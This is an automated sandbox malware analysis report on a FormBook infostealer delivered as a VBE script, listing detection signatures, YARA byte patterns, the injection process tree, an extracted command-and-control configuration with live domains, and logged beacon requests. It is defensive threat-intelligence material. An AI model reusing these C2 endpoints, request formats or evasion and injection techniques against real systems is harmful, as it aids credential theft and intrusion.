Windows Analysis Report
TNS71092E68UI0.vbe

Overview

General Information

Sample name: TNS71092E68UI0.vbe
Analysis ID: 1482976
MD5: 83ef588dc92a85ef93d055290393a07d
SHA1: c7fa54bb9f8d5467137197b8e344b95d2e1f4430
SHA256: 02500b9058612028c5667bfd9302d81184689fcb88eb5500902d39baec246fa0
Tags: FormbookTNTvbe

Detection

FormBook
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus detection for dropped file
Benign windows process drops PE files
Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for submitted file
System process connects to network (likely due to code injection or exploit)
Yara detected FormBook
.NET source code contains potential unpacker
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found direct / indirect Syscall (likely to bypass EDR)
Injects a PE file into a foreign processes
Machine Learning detection for dropped file
Maps a DLL or memory area into another process
Modifies the context of a thread in another process (thread injection)
Performs DNS queries to domains with low reputation
Queues an APC in another process (thread injection)
Sample uses process hollowing technique
Sigma detected: WScript or CScript Dropper
Switches to a custom stack to bypass stack traces
Tries to detect virtualization through RDTSC time measurements
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Allocates memory with a write watch (potentially for evading sandboxes)
Checks if the current process is being debugged
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to open a port and listen for incoming connection (possibly a backdoor)
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
Found decision node followed by non-executed suspicious APIs
Found inlined nop instructions (likely shell or obfuscated code)
Found large amount of non-executed APIs
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

  • System is w10x64
  • wscript.exe (PID: 4396 cmdline: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • HHhHh.exe (PID: 6728 cmdline: "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: 62FA567CBB7227AEB7755B679D780725)
      • HHhHh.exe (PID: 5308 cmdline: "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: 62FA567CBB7227AEB7755B679D780725)
        • explorer.exe (PID: 1028 cmdline: C:\Windows\Explorer.EXE MD5: 662F4F92FDE3557E86D110526BB578D5)
          • wscript.exe (PID: 1632 cmdline: "C:\Windows\SysWOW64\wscript.exe" MD5: FF00E0480075B095948000BDC66E81F0)
            • cmd.exe (PID: 6696 cmdline: /c del "C:\Users\user\AppData\Local\Temp\HHhHh.exe" MD5: D0FCE3AFA6AA1D58CE9FA336CC2B675B)
              • conhost.exe (PID: 1476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup
Source | Rule | Description | Author | Strings
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp | Windows_Trojan_Formbook_1112e116 | unknown | unknown
      • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
      • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
      • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
      • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
      • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
      • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
      • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
      • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
      • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
      • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
      • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
      • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
      • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
      • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
      • 0x18849:$sqlite3step: 68 34 1C 7B E1
      • 0x1895c:$sqlite3step: 68 34 1C 7B E1
      • 0x18878:$sqlite3text: 68 38 2A 90 C5
      • 0x1899d:$sqlite3text: 68 38 2A 90 C5
      • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
      • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C
Source | Rule | Description | Author | Strings
4.2.HHhHh.exe.400000.0.raw.unpack | JoeSecurity_FormBook | Yara detected FormBook | Joe Security
4.2.HHhHh.exe.400000.0.raw.unpack | JoeSecurity_FormBook_1 | Yara detected FormBook | Joe Security
4.2.HHhHh.exe.400000.0.raw.unpack | Windows_Trojan_Formbook_1112e116 | unknown | unknown
          • 0x6251:$a1: 3C 30 50 4F 53 54 74 09 40
          • 0x1cbc0:$a2: 74 0A 4E 0F B6 08 8D 44 08 01 75 F6 8D 70 01 0F B6 00 8D 55
          • 0xa9cf:$a3: 1A D2 80 E2 AF 80 C2 7E EB 2A 80 FA 2F 75 11 8A D0 80 E2 01
          • 0x158b7:$a4: 04 83 C4 0C 83 06 07 5B 5F 5E 8B E5 5D C3 8B 17 03 55 0C 6A 01 83
4.2.HHhHh.exe.400000.0.raw.unpack | Formbook_1 | autogenerated rule brought to you by yara-signator | Felix Bilstein - yara-signator at cocacoding dot com
          • 0x9908:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x9b82:$sequence_0: 03 C8 0F 31 2B C1 89 45 FC
          • 0x156b5:$sequence_1: 3C 24 0F 84 76 FF FF FF 3C 25 74 94
          • 0x151a1:$sequence_2: 3B 4F 14 73 95 85 C9 74 91
          • 0x157b7:$sequence_3: 3C 69 75 44 8B 7D 18 8B 0F
          • 0x1592f:$sequence_4: 5D C3 8D 50 7C 80 FA 07
          • 0xa59a:$sequence_5: 0F BE 5C 0E 01 0F B6 54 0E 02 83 E3 0F C1 EA 06
          • 0x1441c:$sequence_6: 57 89 45 FC 89 45 F4 89 45 F8
          • 0xb293:$sequence_7: 66 89 0C 02 5B 8B E5 5D
          • 0x1b927:$sequence_8: 3C 54 74 04 3C 74 75 F4
          • 0x1c92a:$sequence_9: 56 68 03 01 00 00 8D 85 95 FE FF FF 6A 00
4.2.HHhHh.exe.400000.0.raw.unpack | Formbook | detect Formbook in memory | JPCERT/CC Incident Response Group
          • 0x18849:$sqlite3step: 68 34 1C 7B E1
          • 0x1895c:$sqlite3step: 68 34 1C 7B E1
          • 0x18878:$sqlite3text: 68 38 2A 90 C5
          • 0x1899d:$sqlite3text: 68 38 2A 90 C5
          • 0x1888b:$sqlite3blob: 68 53 D8 7F 8C
          • 0x189b3:$sqlite3blob: 68 53 D8 7F 8C

System Summary

Source: Process started | Author: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", ProcessId: 4396, ProcessName: wscript.exe
Source: Process started | Author: Michael Haag | Data: Command: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 1028, ProcessCommandLine: C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\TNS71092E68UI0.vbe", ProcessId: 4396, ProcessName: wscript.exe
No Snort rule has matched

Timestamp | SID | Source Port | Destination Port | Protocol | Classtype
2024-07-26T13:07:33.006686+0200 | 2031453 | 49725 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:06:31.117213+0200 | 2031453 | 49723 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:03:59.789400+0200 | 2022930 | 443 | 49717 | TCP | A Network Trojan was detected
2024-07-26T13:04:29.975873+0200 | 2031453 | 49719 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:03:47.731358+0200 | 2527003 | 80 | 49716 | TCP | Misc Attack
2024-07-26T13:03:48.249330+0200 | 2031453 | 49716 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:02:59.626273+0200 | 2031453 | 49718 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:03:21.583205+0200 | 2022930 | 443 | 49709 | TCP | A Network Trojan was detected
2024-07-26T13:06:10.664892+0200 | 2031453 | 49722 | 80 | TCP | Malware Command and Control Activity Detected
2024-07-26T13:05:50.281197+0200 | 2031453 | 49721 | 80 | TCP | Malware Command and Control Activity Detected

AV Detection

Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Avira: detection malicious, Label: HEUR/AGEN.1357443
          Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmpMalware Configuration Extractor: FormBook {"C2 list": ["www.happygreenfarm.com/de94/"], "decoy": ["way2future.net", "worldnewsdailys.online", "rendamaisbr.com", "s485.icu", "vcxwpo.xyz", "imagivilleartists.com", "herbatyorganics.com", "xn--80ado1abokv5d.xn--p1acf", "invigoratewell.com", "especialistaleitura.online", "pkrstg.com", "performacaretechnical.com", "dreamgame55.net", "hkitgugx.xyz", "istanlikbilgiler.click", "slotter99j.vip", "exploringtheoutdoors.net", "triberoots.com", "energiaslotsbet.com", "dkforcm.com", "rtp1kijangwin.top", "monkeytranslate.com", "21stcut.shop", "hgty866.xyz", "shaktitest.site", "monrocasino-508.com", "level4d1.bet", "nbcze.com", "rtproketslotcsn.art", "xjps.ltd", "yoanamod.com", "gv031.net", "mceliteroofing.com", "1wtrh.com", "online-dating-24966.bond", "dentalbrasstacks.com", "kf7wzmuzv0w.xyz", "gyosei-arimura.com", "shopyzones.shop", "bradleyboy.xyz", "bradleyboy.xyz", "nownzen.store", "buysellrepresent.com", "tateshades.xyz", "club1stclass.com", "2309238042.com", "ashleymorgan.live", "xn--pdr89n.vip", "princecl.xyz", "mindfulmanifest.net", "c4ads.net", "exlith.com", "jiogskeojg.xyz", "lxrtl.com", "cshark-sguser.com", "h021b.rest", "alfiethorhalls.com", "librosinfantiles.top", "alazamexports.com", "mehalhouse.com", "slvtapeworld.com", "mybest.engineer", "legalix.xyz", "kuuichi.xyz"]}
Source: TNS71092E68UI0.vbe | Virustotal: Detection: 16%
Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Joe Sandbox ML: detected
Source: Binary string: wntdll.pdb source: HHhHh.exe, wscript.exe
Source: Binary string: wscript.pdb source: wscript.exe
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 6_2_009C23CE GetFileAttributesW,GetLastError,FindFirstFileW,WideCharToMultiByte,GetLastError,__alloca_probe_16,WideCharToMultiByte,GetFileAttributesA,GetLastError,FindFirstFileA,FindClose
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4x nop then pop ebx | 4_2_00407B20
Source: C:\Windows\SysWOW64\wscript.exe | Code function: 4x nop then pop ebx | 6_2_00907B20

Networking

Source: C:\Windows\explorer.exe | Network Connect: 103.169.142.0 80
Source: C:\Windows\explorer.exe | Network Connect: 198.54.117.242 80
Source: Malware configuration extractor | URLs: www.happygreenfarm.com/de94/
Source: DNS query: www.tateshades.xyz
Source: DNS query: www.legalix.xyz
Source: global traffic | HTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=KxdOA0Mo1WZhrruLdWg4BGjiUazPRKkva+c6BVUkR9pg9lvbFJGOvuIlGrqlewJrvTBn HTTP/1.1 Host: www.tateshades.xyz Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de94/?jBZ=DixB1qykAeF3P3PXJeHdSknPWO1HgPnInxoSQIfAm9wP6zKJEe36YOPFRPwN1ZbEVsUi&iH=L48pdJnx HTTP/1.1 Host: www.gyosei-arimura.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=5tT0wx6F9dDlvd0I7/Gf0Z876YhP5UCSCTQNI7gCLgEp6gs1sNLPrbs4iKZbSyW3sHh4 HTTP/1.1 Host: www.ashleymorgan.live Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de94/?jBZ=oGEpRlg+OmPq0B7KIcYot+ASNw6YPmukejZMyF938WrRMvUmELkE1jbD5t8azbvrsm6P&iH=L48pdJnx HTTP/1.1 Host: www.rendamaisbr.com Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: global traffic | HTTP traffic detected: GET /de94/?iH=L48pdJnx&jBZ=2R5LA04AgrrHOF4dber2AYa+4EXsdsXp9ugXIfcwTjx7QxDViEac/VVT3dt/yVkMwVF8 HTTP/1.1 Host: www.especialistaleitura.online Connection: close Data Raw: 00 00 00 00 00 00 00 Data Ascii:
Source: Joe Sandbox View | IP Address: 103.169.142.0
Source: Joe Sandbox View | IP Address: 198.54.117.242
Source: Joe Sandbox View | ASN Name: MTSRU
Source: Joe Sandbox View | ASN Name: AARNET-AS-APAustralianAcademicandResearchNetworkAARNe
Source: Joe Sandbox View | ASN Name: NAMECHEAP-NETUS
Source: unknown | UDP traffic detected without corresponding DNS query: 1.1.1.1
Source: C:\Windows\explorer.exe | Code function: 5_2_11269F82 getaddrinfo,setsockopt,recv
Source: global traffic | DNS traffic detected: DNS query: www.tateshades.xyz
Source: global traffic | DNS traffic detected: DNS query: www.gyosei-arimura.com
Source: global traffic | DNS traffic detected: DNS query: www.ashleymorgan.live
Source: global traffic | DNS traffic detected: DNS query: www.gv031.net
Source: global traffic | DNS traffic detected: DNS query: www.rendamaisbr.com
Source: global traffic | DNS traffic detected: DNS query: www.especialistaleitura.online
Source: global traffic | DNS traffic detected: DNS query: www.rtproketslotcsn.art
Source: global traffic | DNS traffic detected: DNS query: www.exploringtheoutdoors.net
Source: global traffic | DNS traffic detected: DNS query: www.invigoratewell.com
Source: global traffic | DNS traffic detected: DNS query: www.legalix.xyz
Source: global traffic | DNS traffic detected: DNS query: www.21stcut.shop
Source: global traffic | HTTP traffic detected: HTTP/1.1 404 Not Found Date: Fri, 26 Jul 2024 11:05:29 GMT Content-Type: text/html Transfer-Encoding: chunked Connection: close CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MAbLK1QdlRV6LTBnBQHP4GMtosATTCpVjiz%2F%2B8enYj6c8u0AHIppOl0xFo2qiVuQVaotmCVNuMU9HCRRoMoShzJFVrl5VcK8YiriQ5ZaRymFb5cMcNjDMhOkipfaQtZ83MDb%2F%2FPM"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8a93ea39e95042c0-EWR alt-svc: h3=":443"; ma=86400 Data Raw: 39 39 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 32 32 2e 31 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 0d 0a 30 0d 0a 0d 0a Data Ascii: 99<html><head><title>404 Not Found</title></head><body><center><h1>404 Not Found</h1></center><hr><center>nginx/1.22.1</center></body></html>0

E-Banking Fraud

Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY

System Summary

Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.HHhHh.exe.400000.0.raw.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 4.2.HHhHh.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4519776308.0000000003130000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4518736574.0000000000900000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000004.00000002.2206699607.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000002.00000002.2150854025.00000000036B9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Formbook_1112e116 | Author: unknown
Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: autogenerated rule brought to you by yara-signator | Author: Felix Bilstein - yara-signator at cocacoding dot com
Source: 00000006.00000002.4519112840.0000000002C50000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: detect Formbook in memory | Author: JPCERT/CC Incident Response Group
Source: C:\Windows\System32\wscript.exe | COM Object queried: ADODB.Stream HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{00000566-0000-0010-8000-00AA006D2EA4}
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A360 NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A410 NtReadFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A490 NtClose
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A540 NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A35A NtCreateFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_0041A53A NtAllocateVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2B60 NtClose,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2BF0 NtAllocateVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2AD0 NtReadFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2D30 NtUnmapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2D10 NtMapViewOfSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2DF0 NtQuerySystemInformation,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2DD0 NtDelayExecution,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2C70 NtFreeVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2CA0 NtQueryInformationToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2F30 NtCreateSection,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2FB0 NtResumeThread,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2F90 NtProtectVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2FE0 NtCreateFile,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2EA0 NtAdjustPrivilegesToken,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2E80 NtReadVirtualMemory,LdrInitializeThunk
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D4340 NtSetContextThread
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D4650 NtSuspendThread
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2BA0 NtEnumerateValueKey
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2B80 NtQueryInformationFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2BE0 NtQueryValueKey
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2AB0 NtWaitForSingleObject
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2AF0 NtWriteFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2D00 NtSetInformationFile
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2DB0 NtEnumerateKey
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2C00 NtQueryInformationProcess
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2C60 NtCreateKey
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2CF0 NtOpenProcess
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2CC0 NtQueryVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2F60 NtCreateProcessEx
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2FA0 NtQuerySection
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2E30 NtWriteVirtualMemory
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D2EE0 NtQueueApcThread
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D3010 NtOpenDirectoryObject
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D3090 NtSetValueKey
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D35C0 NtCreateMutant
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D39B0 NtGetContextThread
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D3D10 NtOpenProcessToken
Source: C:\Users\user\AppData\Local\Temp\HHhHh.exe | Code function: 4_2_012D3D70 NtOpenThread
Source: C:\Windows\explorer.exe | Code function: 5_2_11269232 NtCreateFile
Source: C:\Windows\explorer.exe | Code function: 5_2_1126AE12 NtProtectVirtualMemory
          Source: C:\Windows\explorer.exeCode function: 5_2_1126AE0A NtProtectVirtualMemory,5_2_1126AE0A
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2CA0 NtQueryInformationToken,LdrInitializeThunk,6_2_04DA2CA0
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C70 NtFreeVirtualMemory,LdrInitializeThunk,6_2_04DA2C70
          Source: C:\Windows\SysWOW64\wscript.exeCode function: 6_2_04DA2C60 NtCreateKey,LdrInitializeThunk,6_2_04DA2C60
